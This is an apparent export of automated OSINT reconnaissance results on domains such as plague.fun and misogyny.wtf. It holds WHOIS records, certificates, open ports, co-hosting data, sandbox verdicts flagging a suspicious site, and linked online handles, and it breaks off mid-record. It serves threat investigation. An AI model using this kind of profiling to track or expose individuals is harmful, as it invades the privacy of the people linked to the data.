Date Found Type Risky Data Type Module Children Correlations Distance Starred Annotation Data Source Data 2022-12-18 00:12:06 Physical Location No ipapi.co 1 0 2 0 None Toronto, Ontario, ON, Canada, CA 104.21.28.240 2022-12-18 00:27:43 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.sk plague.fun 2022-12-18 00:05:39 Internet Name - Unresolved No Certificate Transparency 0 0 1 0 None hook.plague.fun plague.fun 2022-12-18 00:17:00 Web Content Type No Web Spider 0 0 4 0 None application/javascript http://webmail.zerotwo-best-waifu.online/js/vendor/bootstrap.min.js 2022-12-18 00:04:10 SSL Certificate - Raw Data No SSL Certificate Analyzer 0 0 2 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Aug 3 00:00:00 2022 GMT Not After : Aug 2 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee: e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f: 17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77: 53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9: 9a:ab:1a:dd:7d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90 X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9: 03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E Timestamp : Aug 3 19:12:00.178 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5: 28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27: DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A: 25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F: 8A:70:C8:E6:BA:DA Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB: B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C Timestamp : Aug 3 19:12:00.017 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2: F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94: BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8: 22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA: F5:C9:B6:E6:AF:CD:A6:FB Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09: 4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A Timestamp : Aug 3 19:12:00.038 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91: 2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA: EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED: F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E: 8C:3E:16:39:2B:64:D1:78 Signature Algorithm: ecdsa-with-SHA256 30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c: 73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f: c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c: ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de 188.114.96.0 2022-12-18 00:06:33 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.96.0:80 188.114.96.0 2022-12-18 00:06:44 Open TCP Port No Pulsedive 0 0 2 0 None 104.21.19.243:443 104.21.19.243 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77a94a634bb728f5-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.7.179 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None fanpop (Category: social) https://www.fanpop.com/fans/rasputain rasputain 2022-12-18 00:16:59 HTTP Headers No Web Spider 0 0 4 0 None {"content-length": "26711", "accept-ranges": "bytes", "last-modified": "Fri, 12 Feb 2021 14:43:40 GMT", "connection": "keep-alive", "etag": "\"6026941c-6857\"", "date": "Sun, 18 Dec 2022 00:16:58 GMT", "x-frame-options": "SAMEORIGIN", "content-type": "text/css"} http://webmail.zerotwo-best-waifu.online/css/vendor/font-awesome-4.4.0/css/font-awesome.min.css 2022-12-18 00:40:45 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@namespro.ca Domain Name: misogyny.ca Registry Domain ID: 95142585-CIRA Registrar WHOIS Server: whois.ca.fury.ca Registrar URL: http://www.namespro.ca Updated Date: 2021-12-26T12:40:21Z Creation Date: 2021-07-07T19:00:05Z Registry Expiry Date: 2023-07-07T19:00:05Z Registrar: Namespro Solutions Inc. Registrar IANA ID: not applicable Registrar Abuse Contact Email: abuse@namespro.ca Registrar Abuse Contact Phone: +1.6046818007 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Phone Ext: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Fax Ext: REDACTED FOR PRIVACY Billing Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Name Server: slns1.namespro.ca Name Server: slns2.namespro.ca DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:40:43Z <<< For more information on Whois status codes, please visit https://icann.org/epp % % Use of CIRA's WHOIS service is governed by the Terms of Use in its Legal % Notice, available at http://www.cira.ca/legal-notice/?lang=en % % (c) 2022 Canadian Internet Registration Authority, (http://www.cira.ca/) Domain Name: misogyny.ca Registry Domain ID: 95142585-CIRA Registrar WHOIS Server: whois.ca.fury.ca Registrar URL: http://www.namespro.ca Updated Date: 2021-12-26T12:40:21Z Creation Date: 2021-07-07T19:00:05Z Registry Expiry Date: 2023-07-07T19:00:05Z Registrar: Namespro Solutions Inc. Registrar IANA ID: not applicable Registrar Abuse Contact Email: abuse@namespro.ca Registrar Abuse Contact Phone: +1.6046818007 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: REDACTED FOR PRIVACY Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: REDACTED FOR PRIVACY Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Registry Billing ID: REDACTED FOR PRIVACY Billing Name: REDACTED FOR PRIVACY Billing Organization: REDACTED FOR PRIVACY Billing Street: REDACTED FOR PRIVACY Billing City: REDACTED FOR PRIVACY Billing State/Province: REDACTED FOR PRIVACY Billing Postal Code: REDACTED FOR PRIVACY Billing Country: REDACTED FOR PRIVACY Billing Phone: REDACTED FOR PRIVACY Billing Phone Ext: REDACTED FOR PRIVACY Billing Fax: REDACTED FOR PRIVACY Billing Fax Ext: REDACTED FOR PRIVACY Billing Email: Please ask the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Other contacts of the queried domain name Name Server: slns1.namespro.ca Name Server: slns2.namespro.ca DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:40:43Z <<< For more information on Whois status codes, please visit https://icann.org/epp % % Use of CIRA's WHOIS service is governed by the Terms of Use in its Legal % Notice, available at http://www.cira.ca/legal-notice/?lang=en % % (c) 2022 Canadian Internet Registration Authority, (http://www.cira.ca/) 2022-12-18 00:08:36 Raw Data from RIRs No LeakIX 0 0 1 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'137.117.157.128', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'MICROSOFT-CORP-MSN-AS-BLOCK', u'asn': 8075, u'network': u'137.116.0.0/15'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ae98129b5db3830944f5337cbe57690257fc96a257fc96a4f4476e9', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'content-length': u'27'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'137.117.157.128', u'summary': u'X-Powered-By: Express\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 27\r\nETag: W/"1b-In8yUEPhFNxKgEbXLblXjLte8/U"\r\nDate: Wed, 19 Oct 2022 13:55:05 GMT\r\nConnection: close\r\n\n\nzeeckt.#0001 && Felpes#4003', u'time': u'2022-10-19T13:55:05.379072594Z'}], u'Leaks': None} 137.117.157.128 2022-12-18 00:07:06 Web Content No Web Spider 2 0 2 0 None 403 Forbidden

Forbidden

You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.

http://misogyny.wtf/grab/UsRjS959Rqm4sPG4 2022-12-18 00:06:42 Open TCP Port No Pulsedive 0 0 2 0 None 172.67.190.129:8080 172.67.190.129 2022-12-18 00:09:54 Co-Hosted Site No HackerTarget 0 0 2 0 None brns.xyz 172.67.147.230 2022-12-18 00:11:56 Physical Location No ipapi.co 0 0 1 0 None Campinas, Sao Paulo, SP, Brazil, BR 4.228.83.86 2022-12-18 00:09:34 Co-Hosted Site No HackerTarget 0 0 2 0 None formivankie.tk 104.21.28.240 2022-12-18 00:03:16 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-102.w90-116.abo.wanadoo.fr 90.116.166.102 2022-12-18 00:18:21 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.8:8443 188.114.97.0/24 2022-12-18 00:04:04 Web Technology No Tool - WhatWeb 0 0 1 0 None Werkzeug misogyny.wtf 2022-12-18 00:18:29 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.12:8080 188.114.97.0/24 2022-12-18 00:16:26 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None cdnjs.cloudflare.com 188.114.96.3 2022-12-18 00:12:31 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://188.114.97.3/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c84_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_c84_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_c84_IESQMMUTEX_0_303"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_c84_ConnHashTable<3204>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_c84_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3204"\n "UpdatingNewTabPageData"\n "IsoScope_c84_IE_EarlyTabStart_0xe68_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_c84_ConnHashTable<3204>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.97.3:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "EWM02H3X.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EWM02H3X.txt]- [targetUID: 00000000-00003204]\n Dropped file: "A2U95YN8.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\A2U95YN8.txt]- [targetUID: 00000000-00002656]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "RecoveryStore._5FC32A7B-771D-11ED-B8BD-0800278A77A4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF5679DB4EA798E629.TMP" has type "data"- Location: [%TEMP%\\~DF5679DB4EA798E629.TMP]- [targetUID: 00000000-00003204]\n "_5FC32A7D-771D-11ED-B8BD-0800278A77A4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "_69AE52E4-771D-11ED-B8BD-0800278A77A4_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "down_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "bullet_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DF55B78C45240FC0A5.TMP" has type "data"- Location: [%TEMP%\\~DF55B78C45240FC0A5.TMP]- [targetUID: 00000000-00003204]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "~DFABD3E3197957479F.TMP" has type "data"- Location: [%TEMP%\\~DFABD3E3197957479F.TMP]- [targetUID: 00000000-00003204]\n "EWM02H3X.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\EWM02H3X.txt]- [targetUID: 00000000-00003204]\n "background_gradient_1_" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 1x800 components 3"- [targetUID: N/A]\n "http_403_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "~DF1D6BE22EA1BEC383.TMP" has type "data"- Location: [%TEMP%\\~DF1D6BE22EA1BEC383.TMP]- [targetUID: 00000000-00003204]\n "en-US.5" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.5]- [targetUID: 00000000-00003204]\n "ErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://188.114.97.3/"\n Pattern match: "https://188.114.97.3"'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "188.114.97.3" found in string "https://188.114.97.3/"\n Potential IP "188.114.97.3" found in string "https://188.114.97.3"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'2/91 Antivirus vendors marked sample as malicious (2% detection rate)'}], u'threat_level': 1, u'size': None, u'job_id': u'63922bb48f5d337c6c22e89f', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'188.114.97.3'], u'sha256': u'edc48d9486432976c7bb048b0479c1555a4e484e1cf97587fa7a09b5dec4301b', u'sha512': u'f4e1e07a4601bb76f4f1f811c03709c6767b72f616973ac069ade3ff9c916388eba6d6ed648dc29bb0005d81c1436a81cf4461f2750cdd2c5f85c64d38f7dead', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://188.114.97.3/', u'submission_id': u'63922bb58f5d337c6c22e8a0', u'created_at': u'2022-12-08T18:23:49+00:00', u'filename': None}], u'analysis_start_time': u'2022-12-08T18:23:49+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'628a783d1b5ef73338e3938f0a9082a3', u'network_mode': u'default', u'processes': [], u'sha1': u'b2925a7c2544e98ad52ebfbdd402817adf8fb397', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': u'Malicious site', u'environment_description': u'Windows 7 64 bit', u'verdict': u'suspicious', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}, {u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 17, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://188.114.97.3/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"188.114.97.3:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7992:120:WilError_01"\n "Local\\SM0:6828:120:WilError_01"\n "Local\\SM0:6828:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:7992:120:WilError_01"\n "Local\\SM0:7992:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7992:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:1900:304:WilS 188.114.97.3 2022-12-18 00:08:41 Physical Location No LeakIX 0 0 1 0 None Amsterdam, North Holland, Netherlands 40.113.112.131 2022-12-18 00:31:03 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@dynadot.com Domain Name: plague.chat Registry Domain ID: 7664ba56bd064bbf82bc4fb158862a02-DONUTS Registrar WHOIS Server: whois.dynadot.com Registrar URL: http://dynadot.com Updated Date: 2022-12-08T01:32:43Z Creation Date: 2020-01-31T13:24:11Z Registry Expiry Date: 2023-01-31T13:24:11Z Registrar: Dynadot, LLC Registrar IANA ID: 472 Registrar Abuse Contact Email: abuse@dynadot.com Registrar Abuse Contact Phone: +1.6502620100 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: California Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: US Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Tech ID: REDACTED FOR PRIVACY 